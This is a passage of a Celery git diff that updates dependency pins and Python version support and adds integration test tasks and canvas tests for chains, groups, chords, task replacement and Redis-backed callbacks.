+gevent>=1.5.0
diff --git a/requirements/extras/lzma.txt b/requirements/extras/lzma.txt
deleted file mode 100644
index 9c70afdf861..00000000000
--- a/requirements/extras/lzma.txt
+++ /dev/null
@@ -1 +0,0 @@
-backports.lzma;python_version<"3.3"
diff --git a/requirements/extras/mongodb.txt b/requirements/extras/mongodb.txt
index b3e1256564f..7ad511e68c5 100644
--- a/requirements/extras/mongodb.txt
+++ b/requirements/extras/mongodb.txt
@@ -1 +1 @@
-pymongo[srv]>=3.3.0
+pymongo[srv]>=3.3.0,<3.12.1
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index b0d3f0fb748..6a0c1d208bf 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.2.0
+redis>=3.4.1,<4.0.0
diff --git a/requirements/extras/solar.txt b/requirements/extras/solar.txt
index 2f340276fa5..6be7adf94ff 100644
--- a/requirements/extras/solar.txt
+++ b/requirements/extras/solar.txt
@@ -1 +1 @@
-ephem
+ephem; platform_python_implementation!="PyPy"
diff --git a/requirements/extras/sphinxautobuild.txt b/requirements/extras/sphinxautobuild.txt
new file mode 100644
index 00000000000..01ce5dfaf45
--- /dev/null
+++ b/requirements/extras/sphinxautobuild.txt
@@ -0,0 +1 @@
+sphinx-autobuild>=2021.3.14
\ No newline at end of file
diff --git a/requirements/extras/sqs.txt b/requirements/extras/sqs.txt
index d4a662987a7..8a7fc342f07 100644
--- a/requirements/extras/sqs.txt
+++ b/requirements/extras/sqs.txt
@@ -1,2 +1 @@
-boto3>=1.9.125
-pycurl==7.43.0.5 # Latest version with wheel built (for appveyor)
+kombu[sqs]
diff --git a/requirements/pkgutils.txt b/requirements/pkgutils.txt
index e5653449606..ea4078d78b4 100644
--- a/requirements/pkgutils.txt
+++ b/requirements/pkgutils.txt
@@ -4,7 +4,6 @@ flake8>=3.8.3
flakeplus>=1.1
flake8-docstrings~=1.5
pydocstyle~=5.0; python_version >= '3.0'
-pydocstyle~=3.0; python_version < '3.0'
tox>=3.8.4
sphinx2rst>=1.0
# Disable cyanide until it's fully updated.
diff --git a/requirements/test-ci-base.txt b/requirements/test-ci-base.txt
index 1fca3a107cb..3563008e5ca 100644
--- a/requirements/test-ci-base.txt
+++ b/requirements/test-ci-base.txt
@@ -1,5 +1,4 @@
pytest-cov
-pytest-travis-fold
codecov
-r extras/redis.txt
-r extras/sqlalchemy.txt
diff --git a/requirements/test-integration.txt b/requirements/test-integration.txt
index 1fcda0bd85c..ab2958d21ff 100644
--- a/requirements/test-integration.txt
+++ b/requirements/test-integration.txt
@@ -1,4 +1,3 @@
-simplejson
-r extras/redis.txt
-r extras/azureblockblob.txt
-r extras/auth.txt
diff --git a/requirements/test.txt b/requirements/test.txt
index fd0ba172f90..90c84b1996e 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -1,11 +1,9 @@
-case>=1.3.1
-pytest~=4.6; python_version < '3.0'
-pytest~=6.0; python_version >= '3.0'
+pytest~=6.2
pytest-celery
+pytest-subtests
pytest-timeout~=1.4.2
boto3>=1.9.178
-python-dateutil<2.8.1,>=2.1; python_version < '3.0'
-moto==1.3.7
+moto>=2.2.6
pre-commit
-r extras/yaml.txt
-r extras/msgpack.txt
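
The pytest-subtests dependency added above provides the `subtests` fixture that the new canvas integration tests below lean on. A minimal, hypothetical sketch of the pattern, assuming pytest-subtests is installed: each `subtests.test(...)` block is reported as its own pass or fail instead of aborting the whole test at the first failed assertion.

    # Hypothetical test showing the subtests fixture from pytest-subtests.
    def test_multiple_checks(subtests):
        values = [1, 2, 0]
        for i, value in enumerate(values):
            with subtests.test(msg=f"value {i} is positive"):
                # Each block is reported independently; later blocks still
                # run even if an earlier one fails.
                assert value > 0
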
diff --git a/setup.cfg b/setup.cfg
index fc8847c6200..91641248bc2 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,9 +1,3 @@
-[tool:pytest]
-addopts = --strict-markers
-testpaths = t/unit/
-python_classes = test_*
-xfail_strict=true
-
[build_sphinx]
source-dir = docs/
build-dir = docs/_build
@@ -14,6 +8,7 @@ all_files = 1
# whenever it makes the code more readable.
max-line-length = 117
extend-ignore =
+ E203, # incompatible with black https://github.com/psf/black/issues/315#issuecomment-395457972
D102, # Missing docstring in public method
D104, # Missing docstring in public package
D105, # Missing docstring in magic method
@@ -22,7 +17,6 @@ extend-ignore =
D412, # No blank lines allowed between a section header and its content
E741, # ambiguous variable name '...'
E742, # ambiguous class definition '...'
- F821, # undefined name '...'
per-file-ignores =
t/*,setup.py,examples/*,docs/*,extra/*:
# docstrings
@@ -31,7 +25,7 @@ per-file-ignores =
[bdist_rpm]
requires = pytz >= 2016.7
billiard >= 3.6.3.0,<4.0
- kombu >= 4.6.8,<5.0.0
+ kombu >= 5.2.1,<6.0.0
[bdist_wheel]
universal = 0
diff --git a/setup.py b/setup.py
old mode 100644
new mode 100755
index c5843c28321..6b41a8a71a6
--- a/setup.py
+++ b/setup.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
import codecs
import os
import re
@@ -27,12 +27,12 @@
'eventlet',
'gevent',
'librabbitmq',
- 'lzma',
'memcache',
'mongodb',
'msgpack',
'pymemcache',
'pyro',
+ 'pytest',
'redis',
's3',
'slmq',
@@ -139,7 +139,7 @@ class pytest(setuptools.command.test.test):
user_options = [('pytest-args=', 'a', 'Arguments to pass to pytest')]
def initialize_options(self):
- setuptools.command.test.test.initialize_options(self)
+ super().initialize_options()
self.pytest_args = []
def run_tests(self):
@@ -163,7 +163,7 @@ def run_tests(self):
license='BSD',
platforms=['any'],
install_requires=install_requires(),
- python_requires=">=3.6,",
+ python_requires=">=3.7,",
tests_require=reqs('test.txt'),
extras_require=extras_require(),
cmdclass={'test': pytest},
@@ -185,12 +185,14 @@ def run_tests(self):
"License :: OSI Approved :: BSD License",
"Topic :: System :: Distributed Computing",
"Topic :: Software Development :: Object Brokering",
+ "Framework :: Celery",
"Programming Language :: Python",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Operating System :: OS Independent"
diff --git a/t/benchmarks/bench_worker.py b/t/benchmarks/bench_worker.py
index a2102b8bf19..5c9f6f46ba3 100644
--- a/t/benchmarks/bench_worker.py
+++ b/t/benchmarks/bench_worker.py
@@ -1,7 +1,8 @@
import os
import sys
+import time
-from celery import Celery # noqa
+from celery import Celery
os.environ.update(
NOSETPS='yes',
@@ -48,13 +49,13 @@ def it(_, n):
# by previous runs, or the broker.
i = it.cur
if i and not i % 5000:
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
it.subt = time.monotonic()
if not i:
it.subt = it.time_start = time.monotonic()
elif i > n - 2:
total = tdiff(it.time_start)
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
print('-- process {} tasks: {}s total, {} tasks/s'.format(
n, total, n / (total + .0),
))
@@ -68,7 +69,7 @@ def bench_apply(n=DEFAULT_ITS):
task = it._get_current_object()
with app.producer_or_acquire() as producer:
[task.apply_async((i, n), producer=producer) for i in range(n)]
- print('-- apply {} tasks: {}s'.format(n, time.monotonic() - time_start))
+ print(f'-- apply {n} tasks: {time.monotonic() - time_start}s')
def bench_work(n=DEFAULT_ITS, loglevel='CRITICAL'):
diff --git a/t/distro/test_CI_reqs.py b/t/distro/test_CI_reqs.py
deleted file mode 100644
index a45f3622390..00000000000
--- a/t/distro/test_CI_reqs.py
+++ /dev/null
@@ -1,35 +0,0 @@
-import os
-import pprint
-
-import pytest
-
-
-def _get_extras_reqs_from(name):
- try:
- with open(os.path.join('requirements', name)) as fh:
- lines = fh.readlines()
- except OSError:
- pytest.skip('requirements dir missing, not running from dist?')
- else:
- return {
- line.split()[1] for line in lines
- if line.startswith('-r extras/')
- }
-
-
-def _get_all_extras():
- return {
- os.path.join('extras', f)
- for f in os.listdir('requirements/extras/')
- }
-
-
-def test_all_reqs_enabled_in_tests():
- ci_default = _get_extras_reqs_from('test-ci-default.txt')
- ci_base = _get_extras_reqs_from('test-ci-base.txt')
-
- defined = ci_default | ci_base
- all_extras = _get_all_extras()
- diff = all_extras - defined
- print('Missing CI reqs:\n{}'.format(pprint.pformat(diff)))
- assert not diff
diff --git a/t/integration/tasks.py b/t/integration/tasks.py
index 629afaf2ece..c8edb01d977 100644
--- a/t/integration/tasks.py
+++ b/t/integration/tasks.py
@@ -1,6 +1,6 @@
from time import sleep
-from celery import Task, chain, chord, group, shared_task
+from celery import Signature, Task, chain, chord, group, shared_task
from celery.exceptions import SoftTimeLimitExceeded
from celery.utils.log import get_task_logger
@@ -16,15 +16,26 @@ def identity(x):
@shared_task
-def add(x, y):
- """Add two numbers."""
- return x + y
+def add(x, y, z=None):
+ """Add two or three numbers."""
+ if z:
+ return x + y + z
+ else:
+ return x + y
@shared_task
-def raise_error():
- """Deliberately raise an error."""
- raise ValueError("deliberate error")
+def write_to_file_and_return_int(file_name, i):
+ with open(file_name, mode='a', buffering=1) as file_handle:
+ file_handle.write(str(i)+'\n')
+
+ return i
+
+
+@shared_task(typing=False)
+def add_not_typed(x, y):
+ """Add two numbers, but don't check arguments"""
+ return x + y
@shared_task(ignore_result=True)
@@ -33,6 +44,12 @@ def add_ignore_result(x, y):
return x + y
+@shared_task
+def raise_error(*args):
+ """Deliberately raise an error."""
+ raise ValueError("deliberate error")
+
+
@shared_task
def chain_add(x, y):
(
@@ -76,6 +93,35 @@ def add_replaced(self, x, y):
raise self.replace(add.s(x, y))
+@shared_task(bind=True)
+def replace_with_chain(self, *args, link_msg=None):
+ c = chain(identity.s(*args), identity.s())
+ link_sig = redis_echo.s()
+ if link_msg is not None:
+ link_sig.args = (link_msg,)
+ link_sig.set(immutable=True)
+ c.link(link_sig)
+
+ return self.replace(c)
+
+
+@shared_task(bind=True)
+def replace_with_chain_which_raises(self, *args, link_msg=None):
+ c = chain(identity.s(*args), raise_error.s())
+ link_sig = redis_echo.s()
+ if link_msg is not None:
+ link_sig.args = (link_msg,)
+ link_sig.set(immutable=True)
+ c.link_error(link_sig)
+
+ return self.replace(c)
+
+
+@shared_task(bind=True)
+def replace_with_empty_chain(self, *_):
+ return self.replace(chain())
+
+
@shared_task(bind=True)
def add_to_all(self, nums, val):
"""Add the given value to all supplied numbers."""
@@ -133,6 +179,24 @@ def collect_ids(self, res, i):
return res, (self.request.root_id, self.request.parent_id, i)
+@shared_task(bind=True, default_retry_delay=1)
+def retry(self, return_value=None):
+ """Task simulating multiple retries.
+
+    When return_value is provided, the task returns it after retrying.
+    Otherwise it fails.
+ """
+ if return_value:
+ attempt = getattr(self, 'attempt', 0)
+ print('attempt', attempt)
+ if attempt >= 3:
+ delattr(self, 'attempt')
+ return return_value
+ self.attempt = attempt + 1
+
+ raise self.retry(exc=ExpectedException(), countdown=5)
+
+
@shared_task(bind=True, expires=60.0, max_retries=1)
def retry_once(self, *args, expires=60.0, max_retries=1, countdown=0.1):
"""Task that fails and is retried. Returns the number of retries."""
@@ -143,7 +207,8 @@ def retry_once(self, *args, expires=60.0, max_retries=1, countdown=0.1):
@shared_task(bind=True, expires=60.0, max_retries=1)
-def retry_once_priority(self, *args, expires=60.0, max_retries=1, countdown=0.1):
+def retry_once_priority(self, *args, expires=60.0, max_retries=1,
+ countdown=0.1):
"""Task that fails and is retried. Returns the priority."""
if self.request.retries:
return self.request.delivery_info['priority']
@@ -152,15 +217,21 @@ def retry_once_priority(self, *args, expires=60.0, max_retries=1, countdown=0.1)
@shared_task
-def redis_echo(message):
+def redis_echo(message, redis_key="redis-echo"):
"""Task that appends the message to a redis list."""
redis_connection = get_redis_connection()
- redis_connection.rpush('redis-echo', message)
+ redis_connection.rpush(redis_key, message)
+
+
+@shared_task
+def redis_count(redis_key="redis-count"):
+ """Task that increments a specified or well-known redis key."""
+ redis_connection = get_redis_connection()
+ redis_connection.incr(redis_key)
@shared_task(bind=True)
def second_order_replace1(self, state=False):
-
redis_connection = get_redis_connection()
if not state:
redis_connection.rpush('redis-echo', 'In A')
@@ -224,9 +295,10 @@ def fail(*args):
raise ExpectedException(*args)
-@shared_task
-def chord_error(*args):
- return args
+@shared_task(bind=True)
+def fail_replaced(self, *args):
+ """Replace this task with one which raises ExpectedException."""
+ raise self.replace(fail.si(*args))
@shared_task(bind=True)
@@ -234,6 +306,11 @@ def return_priority(self, *_args):
return "Priority: %s" % self.request.delivery_info['priority']
+@shared_task(bind=True)
+def return_properties(self):
+ return self.request.properties
+
+
class ClassBasedAutoRetryTask(Task):
name = 'auto_retry_class_task'
autoretry_for = (ValueError,)
@@ -244,3 +321,79 @@ def run(self):
if self.request.retries:
return self.request.retries
raise ValueError()
+
+
+# The signatures returned by these tasks wouldn't actually run because the
+# arguments wouldn't be fulfilled - we never actually delay them so it's fine
+@shared_task
+def return_nested_signature_chain_chain():
+ return chain(chain([add.s()]))
+
+
+@shared_task
+def return_nested_signature_chain_group():
+ return chain(group([add.s()]))
+
+
+@shared_task
+def return_nested_signature_chain_chord():
+ return chain(chord([add.s()], add.s()))
+
+
+@shared_task
+def return_nested_signature_group_chain():
+ return group(chain([add.s()]))
+
+
+@shared_task
+def return_nested_signature_group_group():
+ return group(group([add.s()]))
+
+
+@shared_task
+def return_nested_signature_group_chord():
+ return group(chord([add.s()], add.s()))
+
+
+@shared_task
+def return_nested_signature_chord_chain():
+ return chord(chain([add.s()]), add.s())
+
+
+@shared_task
+def return_nested_signature_chord_group():
+ return chord(group([add.s()]), add.s())
+
+
+@shared_task
+def return_nested_signature_chord_chord():
+ return chord(chord([add.s()], add.s()), add.s())
+
+
+@shared_task
+def rebuild_signature(sig_dict):
+ sig_obj = Signature.from_dict(sig_dict)
+
+ def _recurse(sig):
+ if not isinstance(sig, Signature):
+ raise TypeError(f"{sig!r} is not a signature object")
+ # Most canvas types have a `tasks` attribute
+ if isinstance(sig, (chain, group, chord)):
+ for task in sig.tasks:
+ _recurse(task)
+ # `chord`s also have a `body` attribute
+ if isinstance(sig, chord):
+ _recurse(sig.body)
+ _recurse(sig_obj)
+
+
+@shared_task
+def errback_old_style(request_id):
+ redis_count(request_id)
+ return request_id
+
+
+@shared_task
+def errback_new_style(request, exc, tb):
+ redis_count(request.id)
+ return request.id
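
The errback_old_style and errback_new_style tasks above exercise the two error-callback signatures Celery supports: an old-style errback takes a single argument and receives the failing task's id, while an errback that accepts three arguments receives the request, the exception and the traceback (as noted in the test_chord_on_error comment further down). A minimal sketch of linking both styles; the task names and the `app` instance are illustrative assumptions, not part of this change:

    # Sketch only: `app` is assumed to be an existing, configured Celery app
    # with a worker that has these (hypothetical) tasks registered.
    @app.task
    def boom():
        raise ValueError("expected failure")

    @app.task
    def on_error_old(task_id):
        # Old style: called with just the id of the failing task.
        print(f"task {task_id} failed")

    @app.task
    def on_error_new(request, exc, traceback):
        # New style: called with the failing task's request, the exception
        # instance and the traceback.
        print(f"task {request.id} failed with {exc!r}")

    boom.s().on_error(on_error_old.s()).delay()
    boom.s().on_error(on_error_new.s()).delay()
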
diff --git a/t/integration/test_canvas.py b/t/integration/test_canvas.py
index f5d19184a34..11079a70d92 100644
--- a/t/integration/test_canvas.py
+++ b/t/integration/test_canvas.py
@@ -1,22 +1,30 @@
-import os
+import collections
+import re
+import tempfile
+import uuid
from datetime import datetime, timedelta
-from time import sleep
+from time import monotonic, sleep
import pytest
+import pytest_subtests # noqa: F401
from celery import chain, chord, group, signature
from celery.backends.base import BaseKeyValueStoreBackend
-from celery.exceptions import ChordError, TimeoutError
+from celery.exceptions import ImproperlyConfigured, TimeoutError
from celery.result import AsyncResult, GroupResult, ResultSet
-from .conftest import get_active_redis_channels, get_redis_connection
+from . import tasks
+from .conftest import (TEST_BACKEND, get_active_redis_channels,
+ get_redis_connection)
from .tasks import (ExpectedException, add, add_chord_to_chord, add_replaced,
add_to_all, add_to_all_to_chord, build_chain_inside_task,
- chord_error, collect_ids, delayed_sum,
- delayed_sum_with_soft_guard, fail, identity, ids,
- print_unicode, raise_error, redis_echo, retry_once,
- return_exception, return_priority, second_order_replace1,
- tsum)
+ collect_ids, delayed_sum, delayed_sum_with_soft_guard,
+ errback_new_style, errback_old_style, fail, fail_replaced,
+ identity, ids, print_unicode, raise_error, redis_count,
+ redis_echo, replace_with_chain,
+ replace_with_chain_which_raises, replace_with_empty_chain,
+ retry_once, return_exception, return_priority,
+ second_order_replace1, tsum, write_to_file_and_return_int)
RETRYABLE_EXCEPTIONS = (OSError, ConnectionError, TimeoutError)
@@ -36,6 +44,62 @@ def flaky(fn):
return _timeout(_flaky(fn))
+def await_redis_echo(expected_msgs, redis_key="redis-echo", timeout=TIMEOUT):
+ """
+ Helper to wait for a specified or well-known redis key to contain a string.
+ """
+ redis_connection = get_redis_connection()
+
+ if isinstance(expected_msgs, (str, bytes, bytearray)):
+ expected_msgs = (expected_msgs, )
+ expected_msgs = collections.Counter(
+ e if not isinstance(e, str) else e.encode("utf-8")
+ for e in expected_msgs
+ )
+
+    # This can technically wait for `len(expected_msgs) * timeout` :/
+ while +expected_msgs:
+ maybe_key_msg = redis_connection.blpop(redis_key, timeout)
+ if maybe_key_msg is None:
+ raise TimeoutError(
+ "Fetching from {!r} timed out - still awaiting {!r}"
+ .format(redis_key, dict(+expected_msgs))
+ )
+ retrieved_key, msg = maybe_key_msg
+ assert retrieved_key.decode("utf-8") == redis_key
+ expected_msgs[msg] -= 1 # silently accepts unexpected messages
+
+ # There should be no more elements - block momentarily
+ assert redis_connection.blpop(redis_key, min(1, timeout)) is None
+
+
+def await_redis_count(expected_count, redis_key="redis-count", timeout=TIMEOUT):
+ """
+ Helper to wait for a specified or well-known redis key to count to a value.
+ """
+ redis_connection = get_redis_connection()
+
+ check_interval = 0.1
+ check_max = int(timeout / check_interval)
+ for i in range(check_max + 1):
+ maybe_count = redis_connection.get(redis_key)
+ # It's either `None` or a base-10 integer
+ if maybe_count is not None:
+ count = int(maybe_count)
+ if count == expected_count:
+ break
+ elif i >= check_max:
+ assert count == expected_count
+ # try again later
+ sleep(check_interval)
+ else:
+ raise TimeoutError(f"{redis_key!r} was never incremented")
+
+ # There should be no more increments - block momentarily
+ sleep(min(1, timeout))
+ assert int(redis_connection.get(redis_key)) == expected_count
+
+
class test_link_error:
@flaky
def test_link_error_eager(self):
@@ -413,6 +477,282 @@ def test_chain_of_a_chord_and_three_tasks_and_a_group(self, manager):
res = c()
assert res.get(timeout=TIMEOUT) == [8, 8]
+ @flaky
+ def test_nested_chain_group_lone(self, manager):
+ """
+ Test that a lone group in a chain completes.
+ """
+ sig = chain(
+ group(identity.s(42), identity.s(42)), # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_chain_group_mid(self, manager):
+ """
+ Test that a mid-point group in a chain completes.
+ """
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ identity.s(42), # 42
+ group(identity.s(), identity.s()), # [42, 42]
+ identity.s(), # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_chain_group_last(self, manager):
+ """
+ Test that a final group in a chain with preceding tasks completes.
+ """
+ sig = chain(
+ identity.s(42), # 42
+ group(identity.s(), identity.s()), # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_chain_replaced_with_a_chain_and_a_callback(self, manager):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ link_msg = 'Internal chain callback'
+ c = chain(
+ identity.s('Hello '),
+            # The replacement chain will pass its args through
+ replace_with_chain.s(link_msg=link_msg),
+ add.s('world'),
+ )
+ res = c.delay()
+
+ assert res.get(timeout=TIMEOUT) == 'Hello world'
+ await_redis_echo({link_msg, })
+
+ def test_chain_replaced_with_a_chain_and_an_error_callback(self, manager):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ link_msg = 'Internal chain errback'
+ c = chain(
+ identity.s('Hello '),
+ replace_with_chain_which_raises.s(link_msg=link_msg),
+ add.s(' will never be seen :(')
+ )
+ res = c.delay()
+
+ with pytest.raises(ValueError):
+ res.get(timeout=TIMEOUT)
+ await_redis_echo({link_msg, })
+
+ def test_chain_with_cb_replaced_with_chain_with_cb(self, manager):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ link_msg = 'Internal chain callback'
+ c = chain(
+ identity.s('Hello '),
+            # The replacement chain will pass its args through
+ replace_with_chain.s(link_msg=link_msg),
+ add.s('world'),
+ )
+ c.link(redis_echo.s())
+ res = c.delay()
+
+ assert res.get(timeout=TIMEOUT) == 'Hello world'
+ await_redis_echo({link_msg, 'Hello world'})
+
+ def test_chain_with_eb_replaced_with_chain_with_eb(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith('redis'):
+ raise pytest.skip('Requires redis result backend.')
+
+ redis_connection = get_redis_connection()
+ redis_connection.delete('redis-echo')
+
+ inner_link_msg = 'Internal chain errback'
+ outer_link_msg = 'External chain errback'
+ c = chain(
+ identity.s('Hello '),
+ # The replacement chain will die and break the encapsulating chain
+ replace_with_chain_which_raises.s(link_msg=inner_link_msg),
+ add.s('world'),
+ )
+ c.link_error(redis_echo.si(outer_link_msg))
+ res = c.delay()
+
+ with subtests.test(msg="Chain fails due to a child task dying"):
+ with pytest.raises(ValueError):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Chain and child task callbacks are called"):
+ await_redis_echo({inner_link_msg, outer_link_msg})
+
+ def test_replace_chain_with_empty_chain(self, manager):
+ r = chain(identity.s(1), replace_with_empty_chain.s()).delay()
+
+ with pytest.raises(ImproperlyConfigured,
+ match="Cannot replace with an empty chain"):
+ r.get(timeout=TIMEOUT)
+
+ def test_chain_children_with_callbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = identity.si(1337)
+ child_sig.link(callback)
+ chain_sig = chain(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ assert res_obj.get(timeout=TIMEOUT) == 1337
+ with subtests.test(msg="Chain child task callbacks are called"):
+ await_redis_count(child_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_children_with_errbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = fail.si()
+ child_sig.link_error(errback)
+ chain_sig = chain(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain fails due to a child task dying"):
+ res_obj = chain_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Chain child task errbacks are called"):
+            # Only the first child task gets a chance to run and fail
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_with_callback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ chain_sig = chain(add_replaced.si(42, 1337), identity.s())
+ chain_sig.link(callback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ assert res_obj.get(timeout=TIMEOUT) == 42 + 1337
+ with subtests.test(msg="Callback is called after chain finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_with_errback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ chain_sig = chain(add_replaced.si(42, 1337), fail.s())
+ chain_sig.link_error(errback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after chain finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_child_with_callback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_sig = add_replaced.si(42, 1337)
+ child_sig.link(callback)
+ chain_sig = chain(child_sig, identity.s())
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ assert res_obj.get(timeout=TIMEOUT) == 42 + 1337
+ with subtests.test(msg="Callback is called after chain finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_chain_child_with_errback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_sig = fail_replaced.si()
+ child_sig.link_error(errback)
+ chain_sig = chain(child_sig, identity.si(42))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = chain_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after chain finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_task_replaced_with_chain(self):
+ orig_sig = replace_with_chain.si(42)
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
+ def test_chain_child_replaced_with_chain_first(self):
+ orig_sig = chain(replace_with_chain.si(42), identity.s())
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
+ def test_chain_child_replaced_with_chain_middle(self):
+ orig_sig = chain(
+ identity.s(42), replace_with_chain.s(), identity.s()
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
+ def test_chain_child_replaced_with_chain_last(self):
+ orig_sig = chain(identity.s(42), replace_with_chain.s())
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == 42
+
class test_result_set:
@@ -504,6 +844,354 @@ def test_large_group(self, manager):
assert res.get(timeout=TIMEOUT) == list(range(1000))
+ def test_group_lone(self, manager):
+ """
+ Test that a simple group completes.
+ """
+ sig = group(identity.s(42), identity.s(42)) # [42, 42]
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_group_group(self, manager):
+ """
+ Confirm that groups nested inside groups get unrolled.
+ """
+ sig = group(
+ group(identity.s(42), identity.s(42)), # [42, 42]
+ ) # [42, 42] due to unrolling
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_group_chord_counting_simple(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_sig = identity.si(42)
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[42]]
+
+ def test_nested_group_chord_counting_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ gchild_sig = chain((identity.si(1337), ) * gchild_count)
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[1337]]
+
+ def test_nested_group_chord_counting_group(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ gchild_sig = group((identity.si(1337), ) * gchild_count)
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[1337] * gchild_count]
+
+ def test_nested_group_chord_counting_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
